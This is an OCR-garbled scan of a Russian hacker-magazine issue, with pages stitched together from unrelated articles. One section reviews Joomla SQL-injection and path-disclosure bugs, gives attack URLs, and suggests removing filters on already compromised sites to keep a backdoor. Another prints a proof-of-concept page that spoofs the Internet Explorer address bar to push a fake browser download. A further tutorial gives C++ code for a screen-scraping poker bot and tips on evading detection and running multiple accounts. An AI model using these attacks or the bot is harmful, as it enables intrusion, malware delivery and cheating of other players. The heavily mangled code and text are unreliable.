ходят проверку на строгое соответствие операторам 5СН_, проверка 
идетлишь путем использования стандартного метода сіеап из класса 
Д РіІТегІ п риТ: 



Джумла — это система управления содержимым, написанная на 
языках РНР и ДаѵаВсгі рі; и использующая в качестве хранилища базу 
данных Му5С!І_. Является свободным программным обеспечением, 
распространяемым подлицензией ѲІЧІІ 6РІ_. 

Если ты не сталкивался в своей хеккерской деятельности с Зоотіа!, 
тоты просто-напросто живешь на другой планете :). В этом обзоре 
я хочу рассказать сразу о двух потенциальных ЗОЕ- инъекциях в 
различных ветках Джумлы, которые остались незамеченными и не- 
раскрученными. 

Итак, первая инъекция была обнаружена ребятами изУОЫ Еібісаі 
НаскегОгоир ( ѵеЬд.пеі/ІаЬ ) в движке версии 1 .5.21 . 

Как пишут сами ресерчеры, потенциальные ЗОЕ- инъекции были об- 
наружены ими в Зоотіа! 1 .5.20 в рамках исследования на Х55. Об этих 
багах немедленно было сообщено команде разработчиков движка, 
которые вскоре выпустили «пропатченную» версию 1 .5.21 . Слово 
«пропатченную» находится в кавычках, поскольку девелоперы закры- 
ли глаза на большую часть адвисори команды УЕНО и понадеялись на 
то, что эти уязвимости не полностью эксплуатабельны.так какЗоотІа! 
имеет встроенные строковые фильтры безопасности. 

В результате багокопатели раскрыли подробности эксплуатации 
обнаруженных потенциальных ЗОЕ- инъекций широкой публике, чем 
мы, конечноже, воспользуемся. 

Итак, открываем файл ./сотропепІз/сот_\л/еЬІіпкз/тосІеІ5/са1:едогу. 
рбр и находим в нем следующий код: 



<?рІір 

сазе " МОКР ' : 

$ге5іі11: = (з1:гіп§) рпе§_гер1асе ( '/[ л А-2_]/іД ' ' , $зоигсе ); 

Ьгеак; 

сазе ' СМР' : 

$гези11: = (б 1 :гіп§) 

рге§_гер1асе( '/[ л А-20-9_\. - ] /і $зоигсе ); 

$гези11: = 11:піт($ге5и11: л 

Ьгеак; 

Таким образом, по дефолту мы получаем раскрытие путей. 

Аналогичный ба г в тех же самых переменных совсем недавно был обна- 
ружен и в первой версии движка из новой ветки 1 .6. 



ЕХРЮІТ 



Подефолтумы можем воспользоваться лишь раскрытием путей в 
Зоотіа! <= 1 .5.21 : 

• /іпсІех.рІір?ор1:іоп=сот_ыеЫіпк5&ѵіеы=са1:е§опу&ісІ=2&іі11:еп 
_огсІег_Оіп=&іі11:ег_огсІеп=%00 ' 

• /іпсІех.рІір?ор1:іоп=сот_ыеЫіпк5&ѵіеы=са1:е§опу&ісІ=2&іі11:еп 
_огс!ег_Ріг= ' &1і11:ег_огсІег=а5с 



■РипсТіоп _Ьиі1сІ(2иегу() 

{ 

${і11:ег_огсІег = $1:ІіІ5->§е1:51:а1:е( Яі11:ег_огсІег ' ) ; 
$^11:ег_опсІеп_сІіг = $1:ІіІ5->§е1:51:а1:е( ’1і11:ег_огсІег_сІіг ' ); 

$Я11:ег_опсІег = ЗРіІІіегІприІ: : : сіеап ($1і11:ег_огсІещ ' стсі ' ) ; 
$Я11:ег_огсІег_сІіг = 

ЗРіИегІприІ:: : сіеап ($^1:ег_огсІег_сІіщ ' іл/опсі ' ); 

// Іліе пеесі 1:о §е1: а іібі: оТ аіі 
// ыеЬІіпкз іп 1:1іе §іѵеп са1:е§огу 
$диегу = '5ЕІ_ЕСТ * ' . 



и вЗоотІа! 1 .6.0: 

• а1:1:аскеп.іп/Зоот1а160/іпсІех.рІір/и5Іп§- Зоот1а/ех1:еп5Іоп5/ 
сотропеп1:5/соп1:еп1:-сотропеп1:/аг1:іс1е-са1:е§опу-1І5І:/?1і11:ег_ 
огсІег=уеІі§ . пеТ . ААААА АААААААА АААААААА АААААААА А 8Ті11:ег_огсІег_ 
Ріг=2&1іті1:=3&1іті1:5І:аг1:=4 

• аТТаскег . Іп/3оот1а160/іпс1ех. рІір/и5Іп§- доотІа/ех^егіБІопБ/ 
сотропеп1:5/соп1:еп1:-сотропеп1:/аг1:іс1е-са1:е§опу-1І5І:/?1і11:ег_ 
оггіег=1,8Ні11:ег^эггіегД)іг=уеІі§те1:.ВВВВВВВВВВВ^іті1:=38Діті1: 
зТапТ=4 
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Однако багокопатели предлагают воспользоваться данными багами 
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ЕХРЮІТЗ 




Ьир : і'УкеуІоддегопІгпе*сот/ті5сДетр/аЬои>: .Ьігл 






ЕХРЮІТЗ 

РЕѴІЕѴѴ 



-ЕѴѴ 



Рііе Е(Й Ѵіеѵѵ Раѵогііез Іооіз Неір 
& РаѵогіЬез ^ □ Зиддеаіесі 51і:ез ^ ^ ШЬ 51ісе СаІІегу » 

5роо? 



СЗіск ѵуѵучу.Ьіпд. сот 

Переход якобы на Ьіпд.сот 

в уже похеканных инсталляциях Джумлы в контексте протроя- 
н и ван ия движка: тебе необходимо всего лишь удалить фильтры 
ЬЕіІІегІприІ-сІеапу переменных бі Нег о гсі е г_0 і г и Шег_огсІег р после 
чего можно неограниченно пользоваться модифицированной 
уязвимостью. 

Также существует информация, что некие находчивые люди все-таки 
смогли обойти эти пресловутые фильтры, но эксплойт находится в 
глубоком привате. 



ТАВСЕТ5 



Ьоотіа! <= 1.5.21, Ьоотіа! 1.6.0 



50ШТІ0Ы 



Как и всегда, не забываем обновляться с официального сайта раз- 
работчика іщтйаюгс. На момент написания обзора последними 
версиями данной СМ5 были 1 .5.22 и 1 .6.0 соответственно. 

ПОДМЕНА АДРЕСНОЙ СТРОКИ В 
МІСР050РГ ІЫТЕРЫЕТ ЕХРЮРЕР 

ЕЗШЗ 

Напоследок хочу рассказать о небольшом и крайне забавном баге в 
ослике ІЕ, который обнаружил хакер под ником суЬегФазЬ. Данный 
баг позволяетудаленному пользователю произвести простейшую 
с пуф инг- атаку. 

Уязвимость существует из-за ошибки во время обновления панели 
адресной строки всплывающего окна. Удаленный пользователь 
можете помощью специально сформированной веб-страницы за- 
ставить браузер отображать только определенную часть адреса в 
адресной строке. 



ЕХРЮІТ 



В качестве примера с подменой адресной строки сам автор предлагает 
следующий РоС НТМІ_-код: 

<М:т1><МеасІ> 

<те1:а ІтІі-Ір-едиіѵ^'Соп-Іеп-І-Туре" 
соп1:еп1:= ,, 1:ех1:/Іі1:т1; сбаг5е1:=ыіпсІоы5-1252 ,, > 

<те1:а ІтІіІір-едиіѵ^'КЕРКЕБН" соп1:еп1:= ,, 1Ѳ;иг1=Ь1:1:р://млЛл/. 
кеу1о§§егоп1іпе . сот/іпсіех . рЬр" > 

<ѣі1:1е>5роо-Р</1:і1:1е> 

<зсгір1:> 

■Рипсіііоі туОрепО { 

ѵа туыіп=ореп("аЬои1::Ыапк ,, л "туыіпсіоы" ^ 

"1оса1:іоп=1^ 5 с гоІІЬа г 5 =Ѳ„ \л/ісІ1:Кі=ЗѲѲ : , Ьеі^М^ЭѲ" ) ; 




ГЗ ШЭід) }!і 



& - №- І 



Призыв скачать троян под видом нового ІЕ 



туміп . Іосаіііоп . Мге-Р=" Ы:1:р : //шѵі. кеу1о§§егоп1іпе . сот/тізс/ 
1:етр/афЬр?Ь1:1:р://ммл/. Ьіпд.сот/" + Аггау(5) о’°і п (" ") + " 
5е1-Р.Ыип(); 

} 

</зсгір1:> 

</ЬеасІ> 

<ЬосІу опс1іск="туОреп(); "> 

Сііск апуіл/Ьеге оп іііііб ра§е! 

</ЬосІу> 

</М1:т1> 

Также суЬег бІаэЬ предоставляет нам для тестов уже готовую страницу 
с РоС-кодом на кеуІоддегопІіпе.сот/тізсДетр/аЬоиТЫпп . 

Зайдя на эту страницу, мы увидим надписьсо ссылкой, которая при- 
глашает нас перейти на сайт Ьіпд.сот . Нажав на ссылку, мы увидим 
всплывающее окно, в адресной строке которого будет значиться тот 
самый Бинг. Ниже будет находиться еще одна ссылка, призывающая 
скачать новый Іпіегпеі Ехріогег (причем, наведя курсор на «Ооѵѵпіоаб», 
мы неувидим ничего подозрительного, хотя там находится не новая 
версия браузера, а программа-псевдотроян отСайбер Флеша). 

Таким образом, злоумышленниклегко сможет подсунуть пользовате- 
лю Ослика злонамеренный файл. 



ТАК6ЕТ5 



М5 Іпіегпеі Ехріогег 7, 8, 9 



50ШТІ0Ы 



В настоящий момент мелкомягкие все еще не исправили описанную 
уязвимость, так что, еслиты используешь ІЕ, в качестве временной 
меры советую быть внимательнее с незнакомыми всплывающими 
окнами, ц-ц 
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лоно ■кпшру'і на иврите означает -пригодный, дазрошсЯиый-- 



■ - Система кошерного питания • это древнейшая. бережно сохраняемая 



■ | традиция еврейского народа, в ее основе лежат несколько заповедей 
.ѵ из Торы в том числе, относящиеся к здоровью животных. . ; 

1 Ученые изучали и применяли Законы каі ирута на протяжении трех тысяч лет 



Люди различных национальностей и вероисповеданий доверяют 
качеству кошерных продуктов. Во многих странах мира, кошерные ■ 
продукты питания считаются более качественными - из -за строгого 
контроля и дополни юльных требований по гигиене, нишевым добавкам 

и применению химически хетест. ' 

Идеологическую основу кошерного питания прекрасно передает 
поговорка "мм - эю ю. что мы едим". От еды напрямую зависит 








взлом 



■ ■ Владимир «Ооі.егг» Савицкий (каПоТМТеГСЬк.ги) 



N 




ВАШИ СТАВКИ. 
ГОСПОДА. БОТА 
РАД УЮТ ВСЕГДА! 

Пишем бота для раііурокег.сош 



• Онлайн-покер с каждым днем набирает все большую популярность. 
Зто и неудивительно, ведь азартные игры всегда манили людей возмож- 
ностью быстрой и легкой наживы. В результате - появление на просто- 
рах Сети покерных ботов, способных самостоятельно вести игру. 



Но, как известно, в последнее время крупнейшие покер-румы 
начали активно закручивать гайки, выкидывая любителей 
нечестной игры из-за столов. В такой ситуации разработка 
покер-ботов превращается в весьма неблагодарное занятие, а 
порой и просто в пустую трату времени. Казалось бы, овчинка 
не стоит выделки, и тему можно смело закрывать. Однако не 
стоит опускать руки раньше времени. Устраивайся поудобнее, 
сейчас я покажу тебе, как научить собственного бота играть на 
рагіурокег.сот :). 



РІор ака вливаемся в игру 

Как ты уже понял, речь в статье пойдет о написании покерного бота. 
Он рассчитан на работу во время твоего сна/отдыха/еіс. Представь, 
что для улучшения своего благосостояния тебе достаточно лишь 
запустить софтину на забугорном дедике. Прогуливаешься в парке 
— бот работает, спишь — бот наигрывает кэш. Бот полностью имити- 
рует действия игрока мышью, а всю информацию со стола собирает 
снимками необходимых областей. 

Мы не будем лезть в код клиентского софта покер-рума. Это понижа- 
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ет удобство работы взамен на гарантии безопасности и 
стабильности функционирования бота. Однако все не так 
сложно, как тебе кажется :). 

Тигп — реализуем бота 

Итак, перед запуском бота необходимо произвести сле- 
дующие действия: 

1. Сливаем официальный бесплатный клиенте 

рагіурокег.сот . 

2. Запускаем его и регистрируемся в покер-руме. 

3. В настройках клиента ставим четырехцветную колоду 
карт. 

4. Открываем четыре любых игровых стола и устанавли- 
ваем автоматическое расположение окон. 

Обрати внимание, что окна должны располагаться 
именно в автоматическом режиме, иначе бот не сможет 
ориентироваться в игре. Бот имеет собственную панель 
управления. Она рассчитана на разрешение экрана 
1280x1024, размещается ниже игровых столов и выше 
панели задач винды, что позволяет одновременно 
наблюдать за игрой и контролировать работу бота, не 
мешая ему считывать информацию со столов. Согласно 
концепции, бот может играть одновременно на четы- 
рех столах, для каждого из которых выделена область, 
активируемая кликом мыши. Таким образом, мы можем 
выбрать, на каких именно столах будет играть бот. 
Подготовка завершена, но запускать бота пока рано, 
для начала разберемся в начинке софтины. 

Логика работы бота станет понятна после просмотра 
сорца ІІпііЗ.срр. Для экономии места похожие строчки 
кода мы заменим на «...». 

Для удобства хранения инфы создадим четыре объекта 
ТАВБЕ, хранящие данные по каждому столу: 

ТАВІ_Е ІіаЫеІ; 



Тгіскз & Тір$: 



1. Тестируй технические детали действий бота в играх 
на фантики, а стратегии — в играх на реальные деньги. 
В первом случаеты сэкономишь деньги, а во втором — 
время. Дело втом, что в играх без реальных денежных 
затратсрабатывает психологический эффектака «а 

и ладно, не корову проигрываю». Игроки действуют 
хаотично, не сбрасывают слабые руки, чаще блефуют 
итакдалее. 

2. Регулярно просматривай статистику бота нетолько 
на предметтехнических ошибок или неправильного 
следования стратегии, но и на предметтенденций. 
Если игроки распознают шаблонное поведение спустя 
полчаса игры, они смогут использовать это в своих 
целях, и денежный счеттвоего бота будет планомерно 
уменьшаться. 

3. Если есть возможность, используй несколько разных 
аккаунтов для покер-рума. Несмотря на то, что на 
многих ресурсах это запрещено правилами, никто не 
мешает сделать пару запасныхакков — разумеется, 
исключительно ради спортивного интереса :). 

4. Не забывай, что администрация покер-рума может 
распознать работу бота по статистике, которая ведется 
для каждого игрока. 

5. Выбирай столы с новичками на низких ставках. 

Пусть мал выигрыш, зато част :). 



Позиция игрока за столом и предыдущие карты 
выставляются по-дефолту: 

ІіаЫеІ . роБІІііоп = "1"; 

ІіаЫеІ . 1аз1і_сагсІ5 = "зііагіі"; 

Забираем из боксов и присваиваем позиции для каж- 
дого стола: 

ІіаЫеІ . розііііоп = Рогт1->ЕсІі1і1->Тех1і . с_5Ііг ( ) ; 

Запускаем основной цикл. Задержка в начале цикла 
выставлена не случайно. Дело в том, что работа с 
нашими снимками занимает приличное количество 
времени. Данная задержка оптимальна для рабочей 
лошадки Р4 2800МН2, 1 ПБ ОЗУ. 

мЫІе(Іігие) { 

51еер(2000) ; 

Далее следует проверка и прорисовка в окне бота 
ситуации на столах: 

сбеск_5І1іиа1ііоп(1іаЫе1 . зіііиаіііоп , 1іаЫе2 . зіііиаіііогь 
ІіаЫеЗ . згЬиа'Ыоп, 1іаЫе4. зіііиаіііоп) ; 
Рогт1->І_аЬе134->Сар1ііоп = ІіаЫеІ. 5І1іиа1ііоп.с_5Ііг(); 
Рогт1->І_аЬе135->Сар1ііоп = 1іаЫе2.5І1іиа1ііоп.с_5Ііг(); 
Рогт1->І_аЬе136->Сар1ііоп = ІіаЫеЗ. 5І1іиа1ііоп.с_5Ііг(); 
Рогт1->І_аЬе137->Сар1ііоп = 1іаЫе4.5І1іиа1ііоп.с_5Ііг(); 

И, наконец, обработка каждого стола. Рассмотрим на 
примере первого. 

Для начала проверим, требуется ли от бота игра на 
этом столе. Это удобно, поскольку можно отключать 
бота от стола и играть вручную: 

і-р (1іаЫе_1_5Ііаг1і == "§о") { 

Проверяем ситуацию — требуется ли от бота принятие 
каких-либо решений, или сейчас ходят другие игроки: 

і-р (ІіаЫеІ . 5І1:иа1:іоп== ,, сI^еск ,, | 

ІіаЫеІ . зіііиаіііоп == "са11_0 . 10" | | 

ІіаЫеІ. БІІіиаІііог^^'саІЗ^Ѳ. 05" | | 

ІіаЫеІ . БИшаЫог^^' са11_тапу" | 

ІіаЫеІ . Біѣиаѣіог^^'аіііп" ) { 

Обнуляем параметры стола: 

ІіаЫеІ . сотЫпаЫоп = 

ІіаЫеІ . асіііоп = 

Проверяем и прорисовываем карты игрока и карты на 
столе: 

сІіеск_р_сапсІ5( 1 , ІіаЫеІ. р_сагсІ_:Д ІіаЫеІ. р_с а гсІ_2); 
Рогт1->І_аЬе126->Сар1ііоп = ІіаЫеІ. р_сагсІ_1.с_5Ііг(); 
Рогт1->І_аЬе127->Сар1ііоп = ІіаЫеІ. р_сагсІ_2.с_5Ііг(); 
сбеск_1і_сапсІ5( 1 , ІіаЫеІ. 1і_сагсІ_1 ^ ІіаЫеІ. 1і_сагсІ_2, 
ІіаЫеІ . 1і_сагсІ_3 , ІіаЫеІ . 1і_сагсІ_4, ІіаЫеІ . 1і_сапсІ_5 ) ; 
Рогт1->І_аЬе111->Сар1ііоп = ІіаЫеІ. 1і_сагсІ_1.с_5Ііг(); 
Рогт1->І_аЬе112->Сар1ііоп = ІіаЫеІ. 1і_сагсІ_2.с_5Ііг(); 
Рогт1->І_аЬе113->Сар1ііоп = ІіаЫеІ. 1і_сагсІ_3.с_5Ііг(); 




> СІѴСІ 



На диске ты найдешь 
сорцы бота, в которые 
можешь смело вно- 
ситьлюбые измене- 
ния :] 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления. 
Ни автор, ни редакция 
за твои действия 
ответственности не 
несут. 




• Помни, покер-румы 
регулярно обновляют 
свой софт, поэтому для 
полной работоспособ- 
ности бота его необ- 
ходимо периодически 
обновлять! 

• Не забывай, что 
сам бот- всего лишь 
автоматизированное 
средство для игры 

в покер, наиболее 
важная его часть - 
стратегия игры. 
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Расположение столов и бота 



Рогт1->І_аЬе114->Сар1:іоп = іаЬІеІ .1:_сагсІ_4. с_з1:г( ) ; 
Рогт1->І_аЬе115->Сар1:іоп = іаЬІеІ .1:_сагсІ_5 . с_зіг( ) ; 




Панель управления ботом 



// дисплейного контекста устройства. 0 - экран 

{ 

РЮС бсіс = Се1:0С(Ѳ) ; 

і-р (бсіс) //если дескриптор успешно получен 

{ 

Сгарбісз: іТВіітар* Ьтр = пем Сгарбісз: :ТВі1:тар(); 

_*гу { 

Ьтр->ІлІісІ1:б = іл/ісііб; 

Ьтр->Неі§б1: = беі§б1:; 

// Копирует карту бит ив бсіс в Ьтр, выполняя 
// указанную растровую операцию, в данном случае 5КСС0РѴ 
Ві1:В11:(Ьтр->Сапѵа5->НапсІ1е, 0 , 0, іл/ісііб, Меі^М: ^ 

Іісіс, зіагіХ, зіагіУ, 5КСС0РУ) ; 
Ьтр->5аѵеТоРі1е(ои1:Рі1е_пате); 

//сэйв ВМР 

} 

Ріпаііу { 

сіеіеіе Ьтр; //освобождаем память 

} 



} 

Определяем место игрока в данной раздаче (большой блайнд/ } 

малый блайнд/еіс): 



сбеск_розі1:іоп(1, іаЬІеІ); 

Рогті- >1_аЬе162- >Сар1:іоп = іаЬІеІ . розіііоп . с_зіг( ) ; 

Запускаем обработку имеющихся условий согласно выбранной 
стратегии. В данном случае стратегия игры будет напоминать 
шорт-стек на низких лимитах: 

збогізіаскСі, іаЬІеІ); 



Теперь, когда у нас есть возможность сохранять нужные нам 
снимки, возникает вопрос: как установить их идентичность? 
Можно попиксельно сравнивать растровые изображения, но это 
займет много процессорного времени. Мы возьмем за основу 
совпадения контрольных Мйб-сумм у двух изображений, пути 
к которым передаются как входящие параметры, а факт совпа- 
дения будет отражаться в возвращаемом функцией значении. 
Непосредственно для подсчета Мйб-сумм будем использовать 
готовую функцию, заново изобретать велосипед ни к чему: 



В результате мы имеем конкретное решение в свойстве ІаЫеІ .асбоп: 

Рогті- >1_аЬе138- >Сар1:іоп = іаЬІеІ . асііоп . с_з1:г( ) ; 

Рогті- >1_аЬе158- >Сар1:іоп = іаЬІеІ . сотЬіпаІііоп . с_з1:г ( ) ; 

Решение — это хорошо, но от нас клиентская программа покер- 
рума все еще ждет действий. Действуем согласно решению: 

тоизе_с1іск(1 , іаЬІеІ); 

Не стоит забывать, что бот работает автономно, а владельцу нужно 
знать, откуда появились или куда были спущены его кровные. 
Поэтому делаем запись о происходящем в файл статистики: 



Ьооі СНЕСК_М05_5ѴѴ (сбаг* ЕТ_б1е, сЬаг* пеіл/біе) { 
тсІБыгаррег тсІБ; 

// Получим хэш сравниваемого файла 

зісі : : з1:гіп§ ЬазЫ = тсІБ . §еіНа5бРготРі1е(пеіл/Рі1е) ; 

// Получим хэш файла, содержащего шаблон 

зісі : :з1:гіп§ ЬазЬ2 = тсІБ . §еіНазбРготРі1е( ЕТ_Рі1е) ; 

// Сравним хэши 

і- (ЬазЫ==ЬазЬ2) геіигп ігие; 
еізе геіигп -Раізе; 

} 

Реализуем функцию распознавания карты по скриншоту. 
Сравниваем контрольные суммы: 



ыгі1:е_5І:а1:(1, іаЬІеІ); 

Последние карты, с которыми мы играли, записываем в свойство стола. 

іаЬІеІ . 1аз1:_сагсІ5 = іаЬІеІ . р_сагсІ_1 + іаЬІеІ . р_сагсІ_2; 

На этом основной цикл заканчивается. Рассмотрим используемые 
функции более подробно. Создадим функцию для получения нуж- 
ной нам картинки. В переменной оиШ1е_пате получим название 
файла, куда будет необходимо сохранить снимок. Здесь зІагіХ и 
зІагіУ — координаты верхней левой точки прямоугольника с высо- 
той беідЫ и шириной ѵѵісйб. 

ѵоісі РКІІ\ІТ_КЕСТ_5ѴѴ (сбаг* ои1:б1е_пате, 

іпі: зіагіХ, іпі: зіагіУ, іпі місііб, іпі беі§бі) 

// Функция СеЮС извлекает дескриптор 



ѵоісі сбеск_1:бІ5_сагсІ (сбаг* пеы_раіб, 5ігіп§ &сагсІ) { 

// А 

і-р (СНЕСК_М05_5ѴѴ( " . \\ЕТ\\ЕТ_А_р . Ьтр" , пем_ра1:б) ) 

{сагсі = "Ар"; } 

еізе І-Р (СНЕСК_М05_5ѴѴ( " . \\ЕТ\\ЕТ_А_к . Ьтр" , пем_ра1:б) ) 
{сагсі = "Ак"; } 

еізе І-Р (СНЕСК_М05_5ѴѴ( " . \\ЕТ\\ЕТ_А_сб . Ьтр" , пем_ра1:б) ) 
{сагсі = "Асб"; } 

еізе І-Р (СНЕСК_М05_5ѴѴ( " . \\ЕТ\\ЕТ_А_Ь . Ьтр", пеы_раіб)) 
{сагсі = "АЬ"; } 

// К 

еізе { сагсі = } 

} 

Далее для наглядности кода (а значит, и для удобства работы) соз- 



► 054 
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дадим функции проверки карт игрока и карт на столе. Принцип тот 
же — получаем снимок, сравниваем с шаблоном: 

ѵоісі сІіеск_р_сагсІ5(іп1: іаЫе, 5І:гіп§ &сагсІ1, 5І:гіп§ &сагсІ2) { 
іі (іаЫе==1) { 

//скринить первую карту игрока 

РКІІ\ІТ_КЕСТ_5ѴѴ( " . \\ЕТ\\сМ_са гсІ1_1:1 . Ьтр" , 37, 150, 12,22); 
//скринить вторую карту игрока 

РКІІ\ІТ_КЕСТ_5ѴѴ( " . \\ЕТ\\сб_сагсІ2_1:1 . Ьтр" , 55,150, 12,22); 
//распознать первую 

с М е с к_1: М і 5_с а г сі ( " . \\ЕТ\\сІі_сагсІ1_1:1. Ьтр", сагсіі); 
//распознать вторую 

сІіеск_1:ІіІ5_сагсІ(" . \\ЕТ\\сЬ_сагсІ2_1:1. Ьтр", сагсІ2); 

} 

і-р (іаЫе==2) { 

> 

ѵоісі сЬеск_і_сагсІ5 (іпі 1;аЫе, 5ігіп§ &сагсІ1, 5ігіп§ &сагсІ2, 
5ІГІП§ &СЭГСІЗ, 5ІГІП§ &СЭГСІ4, 5ІГІП§ &сагсІ5) { 
і-р (1:аЫе==1) { 

РКІІМТ_КЕСТ_5ѴѴ( " . \\ЕТ\\*1с1 . Ьтр" , 198, 154, 12,22); 
РКІІ\ІТ_КЕСТ_5ѴѴ( " . \\ЕТ\\*1с2 . Ьтр" , 249,154, 12,22); 
РКІІЧТ_КЕСТ_5ѴѴ( " . \\ЕТ\\-ЫсЗ . Ьтр" , 300, 154, 12,22); 
РКІІЧТ_КЕСТ_5ѴѴ( " . \\ЕТ\\*1с4. Ьтр", 351, 154, 12,22); 
РКІІ\ІТ_КЕСТ_5ѴѴ( " . \\ЕТ\\і1с5 . Ьтр" , 402, 154, 12,22); 
//распознать 

сЬеск_іЬІ5_сагсІ(" . \\ЕТ\\1:1с1 . Ьтр", сагсіі) ; 
сЬеск_і:ЬІ5_сагсІ(" . \\ЕТ\\1:1с2.Ьтр" , сагсІ2) ; 
сЬеск_і:ЬІ5_сагсІ(" . \\ЕТ\\1:1сЗ . Ьтр" , сагсІЗ) ; 
сЬеск_і:ЬІ5_сагсІ(" . \\ЕТ\\1:1с4. Ьтр" , сагсІ4) ; 
сЬеск_1:ЬІ5_сагсІ(" . \\ЕТ\\1:1с5 . Ьтр" , сагсІ5) ; 

} 

і-р (іаЫе==2) { 

} 

Не сможем мы обойтись и без функции проверки стола. Координаты 
и размер области, по которой идентифицируется стол, можно зада- 
вать на свой вкус, я предпочел не экономить на размере: 

Ьооі І5_а_1:аЫе (іпі іаЫе_питЬег) { 
і-р (1:аЫе_питЬег==1) { 

РКІІ\ІТ_КЕСТ_5ѴѴ( " . \\ЕТ\\І5_а_іаЫе_1 . Ьтр" , 5, 5, 95, 25) ; 
і-Р (СНЕСК_М05_5\Л/( " . \\ЕТ\\ЕТ_І5_1:аЫе . Ьтр" , 
".\\ЕТ\\І5_а_1:аЫе_1.Ьтр")) геіигп ігие; 
еіве геіигп -Раіве; 

} 

і (іаЫе_питЬег==2) { 

Имитировать действия игрока будем программно, двигая курсор и 
кликая мышью. Естественно, не абы-куда, а по кнопочке, определяе- 
мой стратегией. 

ѵоісі тои5е_с1іск ( пі іаЫе_питЬег , ТАВІ_Е &1:ЬІ5_1:аЫе) { 

і (1:ЬІ5_1:аЫе. асііоп == "-Роісі") { 

5еіСиг5ОгРо5(х+380, у+410); 

тои5е_еѵепі(М01І5ЕЕѴЕІ\ІТР_І_ЕРТ00ІлІІ\І, х+380, у+410, 0,0); 
51еер(100) ; 

тои5е_еѵепі(М01І5ЕЕѴЕІ\ІТР_І_ЕРТІІР, х+380, у+410, 0, 0); 

} 

} 

► 056 



Как ты уже догадался, вся необходимая для игры на конкретном 
столе инфа хранится в экземпляре класса ТАВІ_Е. Он предельно 
прост и откомментирован, поэтому оставим его на самостоятельное 
изучение. Также не будем рассматривать описание функций веде- 
ния статистики, определения ситуации на столе и позиции игрока. 
Теперь: тоѵ аЬ,86Ь; тоѵ сіх,сх; іпі 15Ь. 

«Бред!» — скажешь ты, и будешь абсолютно прав! Если ты читаешь 
эти строки - значит, ты прошел почти весь долгий путь создания 
бота и можешь сделать передышку :). Но расслабляться все еще 
рано, впереди нас ждет самый ответственный этап — анализ и раз- 
работка стратегии игры. 

Все начинающие игроки, как правило, изучают стратегию корот- 
ких стеков (збогізіаск). Рассмотрим ситуацию на префлопе (карты 
розданы игрокам, но на столе все еще пусто), когда у нас на руках 
«карманка» (пара карт одинакового ранга). 

// Итак, удостоверяемся что на столе нет карт 
і-р (іЬІ5_1:аЬ1е.1:_сагсІ_1 == "--") { 

// А на руках у нас карты одинакового ранга: 
і- (сагсІ_гапк(1:ЬІ5_1:аЫе. р_сагсІ_1)== 
сагсІ_гапк(1:ЬІ5_1:аЫе. р_сагсІ_2) ) { 

//Если кто-то до нас повысил ставки 
// или нас заставляют пойти ва-банк 

( (іЬІ5_1:аЫе. БІіиаііоп == "са11_тапу") 

| | (1:ЬІ5_1:аЫе.5І1:иа1:іоп == "аіііп")) { 

//Если карманка выше восьмерок и это уже 
// второй круг торговли, идем ва-банк (аіі іп) 

( (сагсІ_гапк(1:ЬІ5_1:аЫе. р_сагсІ_1)>=9) 

&& (іЬІ5_1:аЫе.1:гасІе_сус1е>=2)) 

{1:ЬІ5_1:аЫе. асііоп = "аіііп";} 

// Если карманка начиная с десяток - 
// не обращаем внимания на круг торговли 
// и сразу идём аіі-іп 

еізе і-Р (сагсІ_гапк(1:ЬІ5_1:аЫе.р_сапсІ_1)>=10) 

{ іЬІ5_іаЫе. асііоп = "аіііп"; } 
еіве { іЬІ5_1:аЫе.ас1:іоп = "-Роісі"; } 

//Если до нас никто внятно не рейзил 

// (ставка была не больше размера большого блайнда) 

} еіве і-Р ((1:ЬІ5_1:аЫе.5І1:иа1:іоп == "сЬеск") 

| | (іЬІ5_1:аЫе.5І1:иа1:іоп == "са11_0.05") | | 

(1:ЬІ5_1:аЫе. БІіиаііоп == "са11_0. 10" ) ) { 

// Если мы находимся в ранней 
// позиции (с нас начинаются торги) 

Заметь, мы рассмотрели лишь одну ситуацию. Полные сорцы стра- 
тегии, как и всего бота, я заботливо приготовил для тебя на диске. 
Разработка стратегии является ключевым этапом создания бота. От 
ее качества напрямую зависит твой возможный доход. Мой вариант 
позволяет боту играть в плюс на низких лимитах, но это далеко не 
предел. Чем больше усилий ты вложишь в разработку собственной 
стратегии, тем больше нулей будет появляться на твоем счету :). 

Віѵег: аіі-іп 

Тестируя бота на протяжении двух месяцев, я заметил одну 
интересную деталь: РагІуРокег имеет защиту от снятия инфор- 
мации со стола посредством снимка изображения. Пару раз 
в месяц наши друзья (привет администрации пати-покера!) 
меняют изображения трех-четырех карт, в результате чего рабо- 
тоспособность бота нарушается. Проблема решается довольно 
просто: достаточно заменить старые шаблоны карт на новые. 
Напоследок отмечу, что написанный бот — всего лишь инстру- 
мент для получения фантиков с изображением американских 
президентов. Истинное удовольствие от игры в покер ты можешь 
испытать, только играя сам. т 
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Подробности на іоіаійѵй ги 



Журнал То(аІ йѴО 
приглашает читателей на 
тематические киноманские 
ночи в кинотеатре «Космос»! 

Всю ночь на большом 
экране мы смотрим лучшие 
фильмы ужасов нашей 
юности! 






ВЗЛОМ 



эволюция аш-зюЕ 

ЭКСПЛОИТОВ В КАРТИНКАХ 

Как загружали трои в 2004 году, и как это происходит сейчас? 




То, насколько простым было исполь- 
зование сііепі-зісіе эксплойтов для вы- 
полнения произвольного кода (прежде 



всего, загрузки и установки руткита) в 
не таком уж далеком 2004 году, хорошо 
иллюстрирует эта картинка. 



Зараженный 

НТМІ. 









Комментарий 

эксперта 




В современном миретрудно най- 
ти человека, использующего ин- 
тернет, но неустанавливающего 
дополнительных расширений 
для своего браузера. Такие рас- 
ширения как РІазЬ установлены 
у подавляющего большинства 
пользователей. А ведь именно 
появление таких плагинов по- 
влияло на изменение ландшафта 
в современном эксплойтострое- 
нии. Теперь безопасность на 
стороне пользователя не может 
контролироваться только со сто- 
роны разработчиков браузера. 

Не менее важна и безопасность 
каждого из установленных 



плагинов, ведь злоумышленни- 
ки могут использовать его для 
внедрения в систему вредонос- 
ного кода. К примеру, появление 
уязвимостей в продуктах не- 
безызвестной компании АбоЬе 
влечетза собой рост количества 
эксплойтов, нацеленных именно 
на эти уязвимости. Причем 
неоперативное закрытие этих 
самыхуязвимостей со стороны 
разработчика дает злоумыш- 
ленникам достаточно большое 
временное окно для успешных 
атак. В последние годы идет яв- 
ный акцент на сІіепРзісІе атаках 
с использованием эксплойтов, 



разрабатываются новыетехники 
или же используются старые, с 
неожиданного для разработчи- 
ков защиты ракурса. В принципе, 
внедреноуже много различных 
механизмов для противодей- 
